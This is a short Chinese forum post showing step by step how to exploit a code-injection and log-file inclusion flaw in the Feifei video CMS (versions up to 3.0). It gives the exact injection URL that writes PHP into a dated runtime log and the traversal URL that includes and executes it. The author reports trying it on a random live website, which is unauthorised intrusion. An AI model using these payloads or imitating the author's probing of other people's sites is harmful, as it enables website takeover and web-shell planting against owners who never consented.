飞飞影视漏洞之远程包含写shell
0x02然后我上去乌云搜索了一下这个程序的漏洞,就找到了这么一个漏洞。http://www.wooyun.org/bugs/wooyun-2014-082291这里是他说了漏洞的形成怎么怎么滴。反正我是觉得好高大上。(原谅我还是一个菜逼)
其他我也不多说了。我今天就来说下,这个漏洞是怎么利用的。毕竟我php学的也不好。也不好给 大家分析这个漏洞...
以下是我本地搭建的环境演示的。
首先 我们先执行这个语句
index.php?s=my-show-id-1{~phpinfo()}.html 这个语句。
如果报错了。显示这样
那就是证明漏洞应该是存在的。
执行完了之后我们看下生成了什么文件。
生成了下图这么一个文件。
index.php?s=my-show-id-\..\runtime\logs\15_06_29.log.html
就可以了。这里生成的文件名是年月日.log.html(年月日就是你当前的日期)
还有就是 include 包含的文件无论是什么格式 都以php执行。
接着我在网上找了一个网站测试了一下
先执行了
index.php?s=my-show-id-1{~phpinfo()}.html
报错了..
好的。我们接着执行
index.php?s=my-show-id-\..\runtime\logs\15_12_15.log.html看看我们有没有写进去。
返回如下
Ok. 我们成功写进去了。返回了phpinfo的信息。
(该漏洞在3.0的都还有漏洞。最新版5.0的修复了。)
至此文章结束。
页:
[1]